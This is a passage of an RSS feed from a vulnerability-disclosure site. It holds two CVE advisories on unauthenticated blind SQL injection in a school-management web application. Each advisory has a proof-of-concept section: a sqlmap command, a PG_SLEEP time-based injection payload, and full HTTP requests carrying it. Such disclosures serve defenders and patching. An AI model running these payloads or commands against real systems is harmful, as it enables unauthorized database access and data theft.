&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;agenda_preferencias.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9606-sql-injection-blind-time-based-vulnerability-in-cod_agenda-parameter-on-agenda_preferenciasphp-endpoint&amp;#34;&amp;gt;CVE-2025-9606: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;agenda_preferencias.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9606&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9606&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;agenda_preferencias.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;agenda_preferencias.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;command&amp;#34;&amp;gt;Command:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sqlmap -r req.txt --risk=3 --level=5 --dbs --dbms=PostgreSQL --batch 
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;example-request&amp;#34;&amp;gt;Example Request
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;20
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;POST /intranet/agenda_preferencias.php HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: application/x-www-form-urlencoded
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 60
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Origin: http://localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/intranet/agenda_preferencias.php
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: [COOKIE]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;tipoacao=Editar&amp;amp;amp;cod_agenda=2&amp;amp;amp;envia_alerta=0&amp;amp;amp;agenda_display=2
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9606/image.png&amp;#34;
	width=&amp;#34;806&amp;#34;
	height=&amp;#34;1023&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9606/image_hu_c74740e10125555c.png 480w, /p/cve-2025-9606/image_hu_f0d4a2c4c2aae934.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;78&amp;#34;
		data-flex-basis=&amp;#34;189px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9606.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9606.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 29 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9607</title>
        <link>https://www.cvehunters.com/p/cve-2025-9607/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9607/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9607-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduletabelaarredondamentoview-endpoint&amp;#34;&amp;gt;CVE-2025-9607: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;/module/TabelaArredondamento/view&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9607&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9607&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/module/TabelaArredondamento/view&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9607-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduletabelaarredondamentoview-endpoint&amp;#34;&amp;gt;CVE-2025-9607: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;/module/TabelaArredondamento/view&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9607&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9607&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/module/TabelaArredondamento/view&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/module/TabelaArredondamento/view&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39;&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;&amp;amp;#39;WqeR&amp;amp;#39;=&amp;amp;#39;WqeR
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;example-request&amp;#34;&amp;gt;Example Request
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/TabelaArredondamento/view?id=1&amp;amp;#39;&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;&amp;amp;#39;WqeR&amp;amp;#39;=&amp;amp;#39;WqeR HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/module/TabelaArredondamento/index?tipo_nota=1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: [COOKIE]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9607/image.png&amp;#34;
	width=&amp;#34;1118&amp;#34;
	height=&amp;#34;1020&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9607/image_hu_cf5abac93c459033.png 480w, /p/cve-2025-9607/image_hu_36a33a0596047057.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;109&amp;#34;
		data-flex-basis=&amp;#34;263px&amp;#34;
	
